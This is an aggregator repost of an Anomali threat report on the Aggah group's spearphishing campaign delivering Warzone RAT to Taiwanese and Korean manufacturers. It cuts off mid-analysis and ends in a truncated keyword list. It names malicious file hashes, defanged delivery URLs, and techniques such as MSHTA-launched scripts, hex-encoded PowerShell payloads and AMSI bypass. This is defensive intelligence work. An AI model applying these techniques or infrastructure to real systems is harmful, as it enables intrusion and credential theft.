One Article Review
| Source |  Anomali |
|---|---|
| Identifiant | 3217113 |
| Date de publication | 2021-08-12 15:00:00 (vue: 2021-08-12 15:05:27) |
| Titre | Aggah Using Compromised Websites to Target Businesses Across Asia, Including Taiwan Manufacturing Industry |
| Texte | Authored by: Tara Gould and Rory Gould
Key Findings
Spearphishing emails are targeting the manufacturing industry in Taiwan and Korea to spread malware.
Compromised websites are being used to host malicious JavaScript, VBScript and PowerShell scripts; delivering Warzone RAT.
Anomali Threat Research assesses with moderate confidence that this campaign is being conducted by the threat group Aggah.
Overview
Anomali Threat Research discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry in Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the threat group Aggah. Our analysis found multiple PowerPoint files that contained malicious macros that used MSHTA to execute a script utilizing PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, we assess with moderate confidence this is Aggah.
Aggah
Aggah is an information-motivated threat group that was first identified in March 2019 by researchers from Unit 42.[1] The researchers initially believed the activity was a campaign targeting entities in the United Arab Emirates (UAE). Further investigation by the same team revealed it to be a global phishing campaign designed to deliver RevengeRat.[2]
Unit 42 initially-believed, due to shared high level TTPs as well as the use of RevengeRat, Aggah was associated with the Gorgon Group, a Pakistani group known for targeting Western governments.[3] However, there were prominent Gorgon Group indicators not observed during that investigation, and therefore Unit 42 was unable to formally associate Aggah with the Gorgon Group. Other researchers agree that Aggah is an Urdu speaking Pakistani group due to the use of Urdu words written in Latin script but stress this does not mean they are the Gorgon Group.[4]
Aggah has been consistently active since 2019, generally using the same identifiable TTPs. This past year was a notable year for the group, with a 2020 campaign targeting Italian organizations and manufacturing sectors around the world.[5] Later that same year, Aggah were observed likely selling or loaning malware to lower-level Nigerian actors.[6] Historically the group has used Internet Archive, Pastebin and Blogspot to host malicious scripts and payloads, usually RevengeRAT.[7] The move to using compromised sites is likely due to fact the Internet Archive hosted files are being taken down much quicker and is a notable change for Aggah.
Technical Analysis
Email
The infection process began with a custom spearphishing email masquerading as “FoodHub.co.uk”, an online food delivery service based in the United Kingdom. The body of the email contained order and shipping information along with an attached PowerPoint file named “Purchase order 4500061977,pdf.ppam”. The email in Figure 1 below was sent on July 8, 2021 to Fon-star International Technology, a Taiwan-based manufacturing company. Other spearphishing emails were sent to CSE group, a Taiwanese manufacturing company, FomoTech a Taiwanese engineering company, and to Hyundai Electric, a Korean power company. Spoofed business-to-business (B2B) email addresses against the targeted industry is activity consistent with Aggah.[8]
Figure 1 - Spoofed Spearphishing Email Sent to Fon Star
PowerPoint File
File name Purchase order 4500061977,pdf.ppam
MD5 b5a31dd4a6af746f32149f9706d68f45
When we analyzed the PowerPoint file, we found obfuscated macros (Figure 2) contained in the document that used MSHTA to execute JavaScript from “http://j[.]mp/4545h |
| Envoyé | Oui |
| Condensat | $hh “aggah “aggah: “amsi “cyber “dlsc “foodhub “http://j “j “mail “mshta “party “purchase “the “warzone “wd ‘amsi ‘j ‘regwrite 001 002 005 007 012 16382fbc7fe46ea16a20a672ade46fc2 16c518de87f7bc9120fa633b9d8192be 177bf22700921e7dcfd1ee275f9d9ada 2019 2020 2021 2196d698d115bcc255a416aa6f2fd842 2fa7913a5aba4c9adcd82b93fe1356a1 4500061977 4b9d71b29bdb33dd2f12ff885b05ac3e 5540511a186c7e9dd1c1465b3b5c8197 5e51aaff95f5 6f7c2413d98d2d5987fda30b6c90eec6 ability abusing access accessed account across active activity actor actors adapt added addresses admin/buy/5 admin/buy/8 af” af/jango/1 af/jango/2 af/jango/3 af/jango/4 af/jango/7 af/wp afgan after against aggah aggah’s agree aid alex align allows along among ams amsi amsiscanbuffer analysis analyzed anomali another anti antivirus appeared appears appendix applications april apt arab archive are around asia asp assess assesses associate associated att&ck attached attachment attribution august authored available ave b2b b5a31dd4a6af746f32149f9706d68f45 b83b57a84f4936412042fdd1ed7161d2 backup barbehenn based been began begun behavior behind being believed below binary bit bitly blogspot body bot brittany browser browsers burbage burbage/aggah business businesses but by: bypass c++ c5abec8c7c276d286238343595323fde campaign campaign’s campaign/ campaign: campaigns capabilities capture carolina carried chain change changed checked checked: checks chemical chemtron chrome chromium class clients code collection collection: com/ com/@paul com/aggah com/resources/blog/warzone com/ru/ com/ru/doc com/ru/doc/ex/all com/ru/doc/ex/encoding com/ru/doc/server com/ru/server com/ru/server2 com/ru/st/all com/ru/st/server com/wp/4 command commodity common commonly company company/research/cyber company/research/the compiler compromised conclusion condition conditions conducted confidence consistent consistently contained containing context continues: control cracked created credential credentials criminal criteria cryptocurrency cse custom davidovich debugger debugging dec0ne decoded decoding defender defense defenses: defensive deliver delivering delivers delivery deobfuscate/decode depending designed desktop detect detected detection different directed directory disable discovered discovery distributor dll dll’ dlls dlsc document documents does domain domaintools down download downloaded dropper due during dynamic early ease edge either electric elmer email emails embedded emirates employee encoded endnotes engineering entities escalation eset especially espionage evade evading evasion evolve exactly example exclude exclusion exe execute executed execution execution: exploited ext fact falcone february figure file files findings first floyd focus folder fomotech fon food formally forums found four foxmail frequently from function functionality further generally getprocaddress github global google gorgon gould governments group hackitup has have hex hiding high historically holland hollowing host hosted hosting hotel hoteloscar however hta html html” http://dlsc http://elmerfloyd http://mail https://dec0ne https://dlsc https://elmerfloyd https://medium https://threatresearch https://unit42 https://warzone https://winstonmmd https://www https://yoroi hyundai ibid identifiable identified imitating impair in/images/5 include: includes: including india indicating indicators industry infection infinite info information ingress initial initially inject injected injection injector input insists integrated interface international internet investigation io/research/2019 iocs italian javascript july june key keylogging keys keys/startup kingdom known korea korean large largely later lateral latest latin least legitimate level library likely line link load loaded loader loadlibrary loaning local locate loki loop lower luca luigi macro macros makes maldocs malicious malware management manager manufacturing manufacturing/ many march maria martire masquerading may md5 mea |
| Tags | Malware Tool Threat |
| Stories | |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.